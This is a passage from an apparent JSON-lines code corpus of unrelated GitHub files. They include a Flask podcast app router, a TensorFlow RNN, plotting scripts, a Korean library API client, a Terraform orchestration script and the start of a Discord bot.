if(comment.createNew(podcastid, episodeid, username, content) == comment.ERR_COULD_NOT_CREATE):\n return redirect(session['history'].get(0) + '?err=1005')\n return redirect(session['history'].get(0))\n\n@app.route('/play//', methods=[\"POST\"])\n@login_required\ndef playtrack(podcastid, episodeid):\n if podcastid == None or episodeid == None:\n return redirect(session[\"history\"].get(-1))\n \n pod = podcast.getPodcastById(podcastid)\n try:\n ep = list(filter(lambda e : e.episodeid == int(episodeid), pod.getAllEpisodes()))[0]\n except:\n return redirect(session[\"history\"].get(-1))\n session['last_played']['pod'] = pod\n session['last_played']['ep'] = ep\n session['last_played']['meta']['is_playing'] = True\n session['last_played']['meta']['current_time'] = 0\n session['last_played']['meta']['tickid'] = 0\n return redirect(session[\"history\"].get(-1))\n\n@app.route('/api/tickupdate', methods=[\"POST\"])\ndef updatetrack():\n is_playing = request.form[\"isPlaying\"] == 'true'\n current_time = request.form[\"currentTime\"]\n tickid = request.form[\"tickid\"]\n playid = request.form[\"playID\"]\n if(is_playing == None or current_time == None):\n return \"ERROR: Data mismatch.\", 500\n if int(tickid) > session['last_played']['meta']['tickid'] and int(playid.split('_')[0]) == session['last_played']['pod'].podcastid and int(playid.split('_')[1]) == session['last_played']['ep'].episodeid:\n session['last_played']['meta'] = {\n 'is_playing': is_playing,\n 'current_time': float(current_time),\n 'tickid': int(tickid)\n }\n return \"Ok.\", 200\n\n@app.route('/api/update/episode', methods=[\"POST\"])\n@login_required\ndef updateepisode():\n podcastid = request.form['update_podcastid']\n episodeid = request.form['update_episodeid']\n title = request.form['update_title']\n description = request.form['update_description']\n pod = podcast.getPodcastById(podcastid)\n if(pod == None):\n return \"ERROR: Data mismatch.\", 500\n if(pod.user_username != current_user.username):\n return 401, \"Unauthorized.\" \n if int(episodeid) not in [e.episodeid for e in pod.getAllEpisodes()]:\n return \"ERROR: Data mismatch.\", 500\n query(\"UPDATE episode SET title = ?, description = ? WHERE podcast_podcastid = ? AND episodeid = ?\", (title, description, podcastid, episodeid,))\n return redirect(session[\"history\"].get(0))\n \n@app.route('/api/update/podcast', methods=[\"POST\"])\n@login_required\ndef updatepodcast():\n podcastid = request.form['update_podcastid']\n title = request.form['update_title']\n description = request.form['update_description']\n pod = podcast.getPodcastById(podcastid)\n if(pod == None):\n return \"ERROR: Data mismatch.\", 500\n if(pod.user_username != current_user.username):\n return 401, \"Unauthorized.\" \n query(\"UPDATE podcast SET title = ?, description = ? WHERE podcastid = ?\", (title, description, podcastid,))\n return redirect(session[\"history\"].get(0))\n\n@app.route('/api/update/comment', methods=[\"POST\"])\n@login_required\ndef updatecomment():\n podcastid = request.form['podcastid']\n episodeid = request.form['episodeid']\n content = request.form['content']\n timestamp = request.form['timestamp']\n if(podcastid == None or episodeid == None or timestamp == None or content == None):\n return \"ERROR: Data mismatch.\", 500\n res = query(\"SELECT * FROM comment WHERE episode_podcast_podcastid = ? AND episode_episodeid = ? AND date_published = ? AND user_username = ?\", (podcastid, episodeid, timestamp, current_user.username, ))\n if(len(res) == 0): \n return \"ERROR: Data mismatch.\", 500\n query(\"UPDATE comment SET content = ? WHERE episode_podcast_podcastid = ? AND episode_episodeid = ? AND date_published = ? AND user_username = ?\", (content, podcastid, episodeid, timestamp, current_user.username, ))\n return redirect(session[\"history\"].get(0))\n\n@app.route('/api/remove/podcast', methods=[\"POST\"])\n@login_required\ndef removepodcast():\n podcastid = request.form['podcastid']\n if(podcastid == None):\n return \"ERROR: Data mismatch.\", 500\n pod = podcast.getPodcastById(podcastid)\n if(pod.user_username != current_user.username):\n return 401, \"Unauthorized.\" \n query(\"DELETE FROM podcast WHERE podcastid = ?\", (podcastid,))\n return redirect('/')\n\n@app.route('/api/remove/episode', methods=[\"POST\"])\n@login_required\ndef removeepisode():\n podcastid = request.form['podcastid']\n episodeid = request.form['episodeid']\n pod = podcast.getPodcastById(podcastid)\n if(pod.user_username != current_user.username):\n return 401, \"Unauthorized.\" \n if int(episodeid) not in [e.episodeid for e in pod.getAllEpisodes()]:\n return \"ERROR: Data mismatch.\", 500\n query(\"DELETE FROM episode WHERE podcast_podcastid = ? AND episodeid = ?\", (podcastid,episodeid, ))\n return redirect('/pod/'+podcastid)\n\n@app.route('/api/remove/comment', methods=[\"POST\"])\n@login_required\ndef removecomment():\n podcastid = request.form['podcastid']\n episodeid = request.form['episodeid']\n timestamp = request.form['timestamp']\n if(podcastid == None or episodeid == None or timestamp == None):\n return \"ERROR: Data mismatch.\", 500\n query(\"DELETE FROM comment WHERE episode_podcast_podcastid = ? AND episode_episodeid = ? AND date_published = ? AND user_username = ?\", (podcastid, episodeid, timestamp, current_user.username, ))\n return redirect(session[\"history\"].get(0))\n\n@app.route('/delete/', defaults={'podcastid': ''})\n@app.route('/delete/')\n@login_required\ndef deletepodview(podcastid):\n pod = podcast.getPodcastById(podcastid)\n if(pod == None):\n return \"ERROR: Data mismatch.\", 500\n return render_template(\"delete.html\", pod=pod, ep=None)\n\n@app.route('/delete/', defaults={'podcastid': '', 'episodeid': ''})\n@app.route('/delete//')\n@login_required\ndef deleteepview(podcastid, episodeid):\n pod = podcast.getPodcastById(podcastid)\n if(pod == None):\n return \"ERROR: Data mismatch.\", 500\n if int(episodeid) not in [e.episodeid for e in pod.getAllEpisodes()]:\n return \"ERROR: Data mismatch.\", 500\n ep = list(filter(lambda e : e.episodeid == int(episodeid), pod.getAllEpisodes()))[0]\n return render_template(\"delete.html\", pod=pod, ep=ep)\n\n","repo_name":"xNicklaj/polito_intro_to_web_app","sub_path":"app/router.py","file_name":"router.py","file_ext":"py","file_size_in_byte":17438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35397344613","text":"import os, sys, csv\r\n\r\n\r\ndef resource_path(relative_path):\r\n try:\r\n base_path = sys._MEIPASS\r\n except:\r\n base_path = os.path.abspath(\".\")\r\n\r\n return os.path.join(base_path, relative_path).replace('\\\\', '/')\r\n\r\n\r\ndef read_file(file_name):\r\n content = []\r\n extension = file_name.split('.')[-1]\r\n\r\n try:\r\n with open(resource_path(file_name), 'r', encoding='utf-8') as f:\r\n if extension == 'txt':\r\n content = f.readlines()\r\n elif extension == 'csv':\r\n content = list(csv.DictReader(f, delimiter=','))\r\n except:\r\n print(f'{file_name} not found')\r\n\r\n return content\r\n\r\n\r\ndef write_file(file_name, content):\r\n with open(resource_path(file_name), 'w', encoding='utf-8') as f:\r\n f.writelines(\"\\n\".join(content))","repo_name":"sopryshko/kith_bot","sub_path":"sources/file_handling.py","file_name":"file_handling.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21565100991","text":"import tensorflow as tf\nimport numpy as np\nfrom tensorflow.contrib import rnn\nimport pprint\n\npp = pprint.PrettyPrinter(indent=4)\nsess = tf.InteractiveSession()\n\nwith tf.variable_scope('rnn_sample') as scope:\n sentence = (\"if you want to build a ship, don't drum up people together to \"\n \"collect wood and don't assign them tasks and work, but rather \"\n \"teach them to long for the endless immensity of the sea.\")\n char_set = list(set(sentence))\n char2idx = {c: i for i,c in enumerate(char_set)}\n\n dic_size = len(char2idx)\n rnn_hidden_size = len(char2idx)\n num_classes = len(char2idx)\n sequence_len = 10\n\n dataX = []\n dataY = []\n for i in range(0, len(sentence) - sequence_len):\n x_str = sentence[i:i+sequence_len]\n y_str = sentence[i + 1: i + sequence_len + 1]\n # print(i, x_str, '->', y_str)\n\n x = [char2idx[c] for c in x_str]\n y = [char2idx[c] for c in y_str]\n\n dataX.append(x)\n dataY.append(y)\n\n batch_size = len(dataX)\n\n\n\n X = tf.placeholder(tf.int32, [None, sequence_len])\n Y = tf.placeholder(tf.int32, [None, sequence_len])\n#\n X_one_hot = tf.one_hot(X, num_classes)\n print(X_one_hot)\n\n cell = tf.contrib.rnn.BasicLSTMCell(num_units=rnn_hidden_size, state_is_tuple=True)\n cell = rnn.MultiRNNCell([cell] * 2, state_is_tuple=True)\n\n# initial_state = cell.zero_state(batch_size, tf.float32)\n outputs, _states = tf.nn.dynamic_rnn(cell, X_one_hot, dtype=tf.float32)\n X_for_softmax = tf.reshape(outputs, [-1, rnn_hidden_size])\n\n softmax_w = tf.get_variable(\"softmax_w\", [rnn_hidden_size, num_classes])\n softmax_b = tf.get_variable(\"softmax_b\", [num_classes])\n\n outputs = tf.matmul(X_for_softmax, softmax_w) + softmax_b\n\n outputs = tf.reshape(outputs, [batch_size, sequence_len, num_classes])\n\n weights = tf.ones([batch_size, sequence_len])\n sequence_loss = tf.contrib.seq2seq.sequence_loss(logits=outputs, targets=Y, weights=weights)\n loss = tf.reduce_mean(sequence_loss)\n # train = tf.train.GradientDescentOptimizer(learning_rate = 0.1).minimize(loss)\n train = tf.train.AdamOptimizer(learning_rate = 0.1).minimize(loss)\n#\n# prediction = tf.argmax(outputs, axis=2)\n#\n#\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for i in range(500):\n _, l, results = sess.run([train, loss, outputs], feed_dict={X: dataX, Y: dataY})\n for j, result in enumerate(results):\n index = np.argmax(result, axis=1)\n print(i, j, ''.join([char_set[c] for c in index]), l)\n # result = sess.run(prediction, feed_dict={X: x_data})\n# result_str = [idx2char[c] for c in np.squeeze(result)]\n# print(i, \"loss: \", l, \"Prediction: \", ''.join(result_str))\n\n results = sess.run(outputs, feed_dict={X: dataX})\n for j, result in enumerate(results):\n index = np.argmax(result, axis=1)\n if j is 0:\n print(''.join([char_set[t] for t in index]), end='')\n else:\n print(char_set[index[-1]], end='')\n\n","repo_name":"xiang578/machine-learning","sub_path":"tftest/rnn-long-char.py","file_name":"rnn-long-char.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"11845611821","text":"def is_valid_string(s):\n\n freq_table = {} # Create a frequency table\n for char in s:\n\n freq_table[char] = freq_table.get(char, 0) + 1 # All repeated charcter incremented by 1 and stored in the dictionary as values.\n \n\n frequencies = list(freq_table.values()) # Count the frequency of each character\n # print(frequencies)\n max_freq = max(frequencies) # Finding the most frequent characters\n min_freq = min(frequencies) # Finding the least frequent characters\n \n if max_freq == min_freq: # Checking All characters have the same frequency\n return \"YES\"\n elif (frequencies.count(min_freq)) > (frequencies.count(max_freq)): # Checking the string after removal of one extra character \n return \"YES\"\n else:\n return \"NO\"\n \nuser_input = input('Enter any string: ')\nprint(is_valid_string(user_input))\n\n","repo_name":"JPrakashKumar/Placement-Assignment_-Prakash-Kumar-Jha-","sub_path":"Question-02_Python.py","file_name":"Question-02_Python.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"30069554651","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport xenodiffusionscope\n\ndef nest_diff_trans_model(field): #cm2/s\n ans = (37.368 * np.power(field, .093452) * \n np.exp(-8.1651e-5 * field))\n return ans\n\ndef plot_transv_diff_literature():\n data = pd.read_csv('Data/diff_studies/diffT_literature.csv', \n sep=';', skipinitialspace =True)\n\n data['D_err_up'] = np.where(data['D_plus'] > 0, \n data['D_plus'] - data['D'], 0)\n data['D_err_down'] = np.where(data['D_minus'] > 0, \n data['D'] - data['D_minus'], 0)\n\n fig, ax = plt.subplots(1,1,figsize = (4.5,3))\n\n mask_exo = data['drift_field'] < 600\n ax.errorbar(data[mask_exo]['drift_field'], data[mask_exo]['D'], \n yerr=(data[mask_exo]['D_err_down'], \n data[mask_exo]['D_err_down']),\n label = 'EXO-200', marker = 'o', capsize = 4, \n ls = '')\n ax.errorbar(data[~mask_exo]['drift_field'], data[~mask_exo]['D'], \n yerr=(data[~mask_exo]['D_err_down'], \n data[~mask_exo]['D_err_down']),\n label = 'Doke & Aprille', marker = 'o', capsize = 4, \n ls = '')\n \n _fields = np.linspace(5,10000,500)\n _nest_model = nest_diff_trans_model(_fields)\n ax.plot(_fields, _nest_model, marker = '', \n ls = '-', label = 'NEST v2.3.12')\n\n ax.set_xlabel('Drift Field [V/cm]')\n ax.set_ylabel('Transverse Diffusion Constant [cm$^2$/s]')\n ax.set_xscale('log')\n ax.set_xlim(5,1e4)\n ax.legend()\n fig.savefig('Figures/D_transverse_literature.pdf')\n \n\n\ndef plot_lamp_pulse():\n lamp = xenodiffusionscope.XeLamp(1)\n fig, ax = plt.subplots(1,1,figsize = (3.5,3))\n _t = np.linspace(0,6,100)\n _pulse = lamp.pulse_lamp(_t)\n ax.plot(_t, _pulse/max(_pulse))\n ax.set_ylabel('Relative intensity')\n ax.set_xlabel('t [$\\mu$s]')\n fig.savefig('Figures/lamp_pulse.pdf')\n\ndef plot_init_pos():\n lamp = xenodiffusionscope.XeLamp(1)\n population = lamp.emitted_electrons_in_interval(0,6)\n x0,y0,z0 = lamp.init_positions(population)\n fig, ax = plt.subplots(1,1,figsize=(3.5,3))\n hh = ax.hist2d(x0,y0, bins = 200, cmin = 1, cmap = coolwarm)\n ax.set_aspect('equal')\n ax.set_ylim(-3,3)\n ax.set_xlim(-3,3)\n ax.set_xlabel('x [mm]')\n ax.set_ylabel('y [mm]')\n fig.colorbar(hh[3],label= 'Number of initial electrons')\n fig.savefig('Figures/init_positions.png')\n\n\nif __name__ == '__main__':\n # Load my style ;)\n\n plt.style.use('../thesis_style.mplstyle')\n\n #the lovely coolwarm colormap :)\n\n from matplotlib.colors import ListedColormap\n\n cm = plt.cm.get_cmap('coolwarm')\n\n # Get the colormap colors, multiply them with the factor \"a\", and create new colormap\n a = 0.85\n coolwarm = plt.cm.coolwarm(np.arange(plt.cm.coolwarm.N))\n coolwarm[:,0:3] *= a \n coolwarm = ListedColormap(coolwarm)\n\n summer = plt.cm.summer(np.arange(plt.cm.summer.N))\n summer[:,0:3] *= a \n summer = ListedColormap(summer)\n \n ### Plots\n #plot_transv_diff_literature()\n plot_lamp_pulse()\n plot_init_pos()\n","repo_name":"ricmperes/thesis_plots","sub_path":"Xenoscope/diff_study_plots.py","file_name":"diff_study_plots.py","file_ext":"py","file_size_in_byte":3191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32493293145","text":"import os\n\nimport matplotlib.pyplot as plt\nfrom osgeo import gdal\nimport numpy\nimport pygeoprocessing\n\nCUR_DIR = os.path.dirname(__file__)\nDATA_DIR = os.path.join(CUR_DIR, '..', '..', 'docker', 'data')\n\n\ndef render(filepath, title, out_filename):\n ds = gdal.Open(filepath)\n band = ds.GetRasterBand(1)\n array = band.ReadAsArray()\n array.astype(numpy.float32)\n nodata = band.GetNoDataValue()\n\n ma_array = numpy.ma.masked_array(array, mask=array==nodata)\n plt.clf() # clear figure\n\n plt.xticks(size='small')\n plt.yticks(size='small')\n\n plt.title(title)\n plt.imshow(ma_array, origin='upper', interpolation='none')\n #plt.imshow(ma_array[100:350, 100:350], origin=(100,100),\n # extent=(100, 350, 100, 350))\n plt.legend(loc='lower right', bbox_to_anchor=(0.55, -.75),\n fontsize='small')\n\n if os.path.exists(out_filename):\n os.remove(out_filename)\n\n plt.savefig(out_filename, dpi=75, bbox_inches='tight')\n\nif __name__ == '__main__':\n unproj_dem = os.path.join(DATA_DIR, 'ASTGTM2_N37W120_dem.tif')\n render(unproj_dem,\n 'ASTER N37W120 (unprojected)',\n 'ASTER-N37W120-unprojected.png')\n\n render(os.path.join(DATA_DIR, 'N37W120.tif'),\n 'ASTER N37W120 (UTM zone 11N)',\n 'ASTER-N37W120-UTM11N.png')\n\n alaska_srs = \"\"\"PROJCS[\"WGS 84 / North Pole LAEA Alaska\",\n GEOGCS[\"WGS 84\",\n DATUM[\"WGS_1984\",\n SPHEROID[\"WGS 84\",6378137,298.257223563,\n AUTHORITY[\"EPSG\",\"7030\"]],\n AUTHORITY[\"EPSG\",\"6326\"]],\n PRIMEM[\"Greenwich\",0,\n AUTHORITY[\"EPSG\",\"8901\"]],\n UNIT[\"degree\",0.01745329251994328,\n AUTHORITY[\"EPSG\",\"9122\"]],\n AUTHORITY[\"EPSG\",\"4326\"]],\n UNIT[\"metre\",1,\n AUTHORITY[\"EPSG\",\"9001\"]],\n PROJECTION[\"Lambert_Azimuthal_Equal_Area\"],\n PARAMETER[\"latitude_of_center\",90],\n PARAMETER[\"longitude_of_center\",-150],\n PARAMETER[\"false_easting\",0],\n PARAMETER[\"false_northing\",0],\n AUTHORITY[\"EPSG\",\"3572\"],\n AXIS[\"X\",UNKNOWN],\n AXIS[\"Y\",UNKNOWN]]\"\"\"\n\n out_filename = 'ASTER_alaska.tif'\n pygeoprocessing.reproject_dataset_uri(\n original_dataset_uri=unproj_dem,\n pixel_spacing=30,\n output_wkt=alaska_srs,\n resampling_method='nearest',\n output_uri=out_filename)\n render(out_filename,\n 'ASTER N37W120 (North Pole LAEA Alaska)',\n 'ASTER-N37W120-northpole.png')\n","repo_name":"geohackweek/raster","sub_path":"_episodes/01-introduction/projection_demos.py","file_name":"projection_demos.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"19"} +{"seq_id":"74078334122","text":"import os\nfrom keras.models import load_model, save_model\nimport sys\n\npath = \"../models\"\ndef convert(filename):\n x = filename\n model = load_model(x)\n model_cfg = model.get_config()\n if(x.startswith(\"ffnn\")):\n for i in range(2):\n model_cfg['layers'][i]['config']['batch_input_shape'] = (1,15)\n new_model = model.__class__.from_config(model_cfg)\n new_model.set_weights(model.get_weights())\n save_model(new_model, path+\"/converted/\"+x[:-29]+\"pr_\"+x[-29:])\n if(x.startswith(\"lstm\")):\n for i in range(2):\n model_cfg['layers'][i]['config']['batch_input_shape'] = (1,64,15)\n new_model = model.__class__.from_config(model_cfg)\n new_model.set_weights(model.get_weights())\n save_model(new_model, path+\"/converted/\"+x[:-29]+\"pr_\"+x[-29:])\n\nif len(sys.argv) > 1:\n for mdl in sys.argv[1:]:\n convert(mdl)\nelse:\n for x in os.listdir(path):\n if x.endswith(\".h5\") and ((x.startswith(\"ffnn_best_h\") or x.startswith(\"lstm_best_h\"))):\n convert(path+\"/\"+x)\n","repo_name":"kitt10/iot","sub_path":"egs/smartblinds/scripts/batch_size_convertor.py","file_name":"batch_size_convertor.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29261567492","text":"import json\nfrom urllib import request, parse\nimport datetime\nimport urllib\nauthkey = '158353134f293055e344b66fa68d3649836912a99af53dcd373bf864905e186f'\n\nlibraryValList = ['gender', 'age', 'addCode', 'ddition_symbol', 'kdc', 'dtl_kdc', 'region', 'dtl_region', 'startDt', 'endDt', 'pageSize']\n\ndef url(data=False) :\n dt_now = datetime.datetime.now()\n page = 10 # 기본 값\n abcd = dict()\n\n url = \"\"\n\n if type(data) == type(abcd) :\n for key, val in data.items():\n if key in libraryValList :\n url+=\"&\"+key+\"=\"+val\n if 'startDt' not in data:\n url += \"&\" + 'startDate' + \"=\" + str(dt_now.year)+\"-01-01\"\n if 'pageSize' not in data:\n url += \"&\" + 'pageSize' + \"=\" + str(page)\n else :\n url += \"&\" + 'startDate' + \"=\" + str(dt_now.year) + \"-01-01\"\n url += \"&\" + 'pageSize' + \"=\" + str(page)\n return url\n\ndef bestSeller(url):\n main = \"http://data4library.kr/api/loanItemSrch?authKey=\"+authkey+\"&format=json\"\n req = request.Request(main+url)\n res = request.urlopen(req)\n res = res.read().decode('utf-8')\n response_json = json.loads(res)\n return response_json\n\ndef bookSearch(isbn) :\n main = \"http://data4library.kr/api/srchDtlList?authKey=\"+ authkey + \"&format=json\"+\"&isbn13=\" + str(isbn)\n print(main)\n req = request.Request(main)\n res = request.urlopen(req)\n res = res.read().decode('utf-8')\n response_json = json.loads(res)\n return response_json\n\ndef bookSearchList(url, keyword) :\n main = \"http://data4library.kr/api/srchBooks?authKey=\"+ authkey + \"&format=json\"+\"&keyword=\"+urllib.parse.quote(keyword)\n mainUrl = main+url\n req = request.Request(mainUrl)\n res = request.urlopen(req)\n res = res.read().decode('utf-8')\n response_json = json.loads(res)\n return response_json\ndef bookInLibrary(isbn, pageSize=10, region=11):\n main = \"http://data4library.kr/api/libSrchByBook?authKey=\" + authkey + \"&format=json\" + \"&isbn=\" + str(isbn) + \\\n \"®ion=\"+str(region) + \"&pageSize=\"+str(pageSize)\n req = request.Request(main)\n res = request.urlopen(req)\n res = res.read().decode('utf-8')\n response_json = json.loads(res)\n\n return response_json","repo_name":"strstrstrstr/booksearch","sub_path":"booksearch/pybo/libraryApi.py","file_name":"libraryApi.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1496506537","text":"import pickle\n\n\ndef get_batch_nums(directory):\n \"\"\"\n This function reads the total number of batches processed for each partition.\n For example, if batch_nums['train'][0] = 10, then Colab has processed\n batches [0, 10) for the train1 partition of the dataset.\n\n :param directory: the directory which holds all of the data from Colab\n :return: a dictionary with the number batches processed by Colab\n \"\"\"\n batch_nums = {'train': []}\n partition = 'train'\n for i in range(1, 4):\n with open(f'{directory}/{partition}{i}_startup.pkl', mode='rb') as file:\n _, batch_num = pickle.load(file)\n batch_nums[partition].append(batch_num)\n for partition in ['validate', 'test']:\n with open(f'{directory}/{partition}_startup.pkl', mode='rb') as file:\n _, batch_nums[partition] = pickle.load(file)\n return batch_nums\n\n\nif __name__ == '__main__':\n print(get_batch_nums('./data'))\n","repo_name":"charles-reinertson/Podcast_Audio_Classification","sub_path":"print_batch_numbers.py","file_name":"print_batch_numbers.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"24860200259","text":"#!/usr/bin/env python3\n\n# Orchestrator build script for all environments - to be called by Gitlab or can be used interactively\nimport argparse\nimport sys\nimport os\nimport inspect\nimport hcl2\n\nfrom ruamel.yaml import YAML\n\n# realpath() will make your script run, even if you symlink it :)\nbuild_dir = os.path.realpath(os.path.abspath(os.path.split(inspect.getfile(inspect.currentframe()))[0]))\nif build_dir not in sys.path:\n sys.path.insert(0, build_dir)\n\n# include utils or lib modules from a subfolder\nfor include_dir in [\"buildscripts\", \"variables\", \"main\"]:\n build_subdir = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile(inspect.currentframe()))[0], include_dir)))\n if build_subdir not in sys.path:\n sys.path.insert(0, build_subdir)\n\nfrom buildscripts.tfmodules import prompt_modules, find_modules\nfrom buildscripts.tfprompts import prompt_account, prompt_tfaction\nfrom buildscripts.tfrun import tfrun\nfrom buildscripts.tfutils import str2bool, is_empty\n\nDEPLOY_YAML_FILE = \"./deploy.yaml\"\nINPUT_ENVS_FILE = \"./variables/_envs.tf\"\nTF_ACTIONS = [\"plan\", \"apply\", \"plan-destroy\", \"apply-destroy\"]\nMODULE_DIRS = [\"main\"]\nMODULES_FOR_SRE_ONLY = [\"./main/containers/ecr-repositories\"]\nEMAIL_SETUP_ONLY = [\"./main/management/email-setup\"]\n\nif os.getenv(\"REGION\", None) is None:\n os.environ[\"REGION\"] = \"eu-west-2\"\nelse:\n REGION = os.getenv('REGION')\n\n\ndef process_arguments():\n \"\"\"\n Parse and process program arguments\n :return: argument parser\n \"\"\"\n parser = argparse.ArgumentParser()\n optional = parser._action_groups.pop()\n required = parser.add_argument_group('Required arguments')\n\n optional.add_argument('-d', '--deploy',\n type=str2bool,\n nargs='?',\n default=False,\n const=False,\n required=False,\n help='Deploy mode using deploy.yaml file')\n\n optional.add_argument('-t', '--tfaction',\n required=False,\n default='',\n help='Terraform action (plan, apply, plan-destroy, or apply-destroy')\n\n optional.add_argument('-a', '--approve',\n type=str2bool,\n nargs='?',\n const=True,\n default=False,\n required=False,\n help='Auto approve?')\n\n optional.add_argument('-w', '--workspace',\n default='',\n required=False,\n help='Env/Workspace')\n\n optional.add_argument('-m', '--modules',\n default='',\n required=False,\n help='List of modules')\n\n optional.add_argument('-k', '--key',\n required=False,\n help='Token key')\n\n optional.add_argument('-b', '--branch',\n required=False,\n help='Merge request branch')\n\n optional.add_argument('-p', '--prereq',\n default=False,\n required=False,\n help='Build pre-requisite base modules')\n\n optional.add_argument('-c', '--concurrent',\n type=str2bool,\n nargs='?',\n default=False,\n required=False,\n help='Build modules using multi-threads?')\n\n\n parser._action_groups.append(optional)\n\n return parser.parse_args()\n\n\ndef parse_envs_file(envs_file):\n \"\"\"\n The envs.tf file contains metadata that required to build an\n environment for a specific workspace\n :param envs_file:\n :return: list of workspaces and workspace data dict\n \"\"\"\n with(open(envs_file, 'r')) as env_file:\n env_dict = hcl2.load(env_file)\n workspaces_dict = env_dict['variable'][0]['envs']['default']\n\n # setup the workspace/account to display and prompt user to select one to build\n workspaces = []\n for workspace in workspaces_dict:\n for key, val in workspace.items():\n workspaces.append(key + \"|\" + val['account_id'] + \"|\" + val ['account'])\n return workspaces, workspaces_dict\n\n\ndef setup_build_data(build_workspace, args, mod, workspaces_dict, deploy=False, deploy_action=None):\n\n build_env = workspaces_dict[0][build_workspace]\n\n if not str2bool(args.deploy):\n # auto-approve set to True in non-interactive mode\n auto_approve = True\n else:\n auto_approve = args.approve\n\n if deploy and deploy_action is not None:\n tfaction = deploy_action\n else:\n tfaction = args.tfaction\n\n build_data = {\n \"workspace\": build_workspace,\n \"modules\": mod,\n \"auto_approve\": auto_approve,\n \"deploy\": args.deploy,\n \"tfaction\": tfaction,\n \"environment\": build_env,\n \"bucket_region\": workspaces_dict[0][build_workspace][\"bucket_region\"],\n \"bucket\": workspaces_dict[0][build_workspace][\"bucket\"],\n \"dynamodb\": workspaces_dict[0][build_workspace][\"dynamodb\"],\n \"multi_thread\": args.concurrent\n }\n\n return build_data\n\n\ndef get_deploy_data():\n src = YAML(typ='safe')\n with open(DEPLOY_YAML_FILE) as f:\n deploy_data = src.load(f)\n return deploy_data\n\n\ndef main():\n\n args = process_arguments()\n modules_to_plan = []\n build_data = {}\n print (f\"Parameters passed to orchestrators:---> tfaction: {args.tfaction}, deploy: {args.deploy}, branch {args.branch}, modules: {args.modules}, pre-req: {args.prereq}, concurrent: {args.concurrent}\")\n\n if not str2bool(args.deploy):\n print (\"running in interactive mode\")\n workspaces, workspaces_dict = parse_envs_file(INPUT_ENVS_FILE)\n\n # prompt user to select an account to build\n account_sel = prompt_account(workspaces)\n if account_sel is None:\n print(\"User abort exiting...\")\n exit (1)\n\n # prompt user to select module(s) to build\n build_modules = prompt_modules(find_modules(MODULE_DIRS))\n if build_modules is None:\n print(\"User abort exiting...\")\n exit (1)\n\n # prompt user to choose terraform action\n tfaction = prompt_tfaction(TF_ACTIONS)\n if tfaction is None:\n print(\"User abort exiting...\")\n exit (1)\n\n args.tfaction = tfaction\n\n # setup build data for tfrun.py\n build_workspace = account_sel.split('|')[0]\n\n if build_workspace != \"sre\":\n for module in MODULES_FOR_SRE_ONLY:\n if module in build_modules:\n print(f\"This module is build in SRE account only: {module}\")\n build_modules.remove(module)\n\n # only run ses-setup in these workspaces below\n if build_workspace != \"sre\":\n for module in EMAIL_SETUP_ONLY:\n if module in build_modules:\n print(f\"Email setup module is build in SRE only: {module}\")\n build_modules.remove(module)\n\n if len(build_modules) > 0:\n print(\"\\n******* Modules to run: *********\")\n print(\"\\n\".join([m for m in build_modules]))\n print(\"**********************************\")\n build_data = setup_build_data(build_workspace, args, build_modules, workspaces_dict)\n tfrun(build_data)\n\n else:\n # running in non interactive mode using deploy.yaml file\n\n if is_empty(args.tfaction) or is_empty(args.workspace):\n print (\"Arguments ERROR: both TF action and workspace are required in using deploy.yaml\")\n exit(1)\n\n deploy_data = get_deploy_data()\n build_modules = deploy_data[\"workspace\"][0][args.workspace]['modules']\n _, workspaces_dict = parse_envs_file(INPUT_ENVS_FILE)\n\n if args.workspace != \"sre\":\n for module in MODULES_FOR_SRE_ONLY:\n if module in build_modules:\n build_modules.remove(module)\n\n # only run ses-setup in these workspaces below\n if args.workspace != \"sre\":\n for module in EMAIL_SETUP_ONLY:\n if module in build_modules:\n print(f\"Email setup module is build in SRE only: {module}\")\n build_modules.remove(module)\n\n build_data = setup_build_data(args.workspace, args, build_modules, workspaces_dict, True, args.tfaction)\n\n if len(build_modules) > 0:\n print(\"\\n******* Modules to run: *********\")\n print(\"\\n\".join([m for m in build_modules]))\n print(\"**********************************\")\n tfrun(build_data)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"dieple/pyrunner","sub_path":"terraform/aws/pyrunner.py","file_name":"pyrunner.py","file_ext":"py","file_size_in_byte":8285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"30037011102","text":"class Solution:\n def divisorSubstrings(self, num: int, k: int) -> int:\n count =0\n new_nums=str(num)\n for i in range(len(new_nums)-k+1):\n window = new_nums[i:i+k]\n if int(window)!=0 :\n if num %int(window)==0:\n count+=1\n return count\n \n ","repo_name":"abeni505/Competitive-Programming","sub_path":"1430-find-the-k-beauty-of-a-number/1430-find-the-k-beauty-of-a-number.py","file_name":"1430-find-the-k-beauty-of-a-number.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"72883191084","text":"import discord\nfrom discord.ext import commands\n\n\nstored = 'bologna'\n\n\n@commands.command()\nasync def bologna(ctx, arg='', data=''):\n global stored\n if arg == 'read':\n await ctx.send(f\"Stored data: `{stored}`\")\n elif arg == 'write':\n if data == '':\n await ctx.send(\"What do you want to store?\")\n else:\n await ctx.send(f\"`{data}` 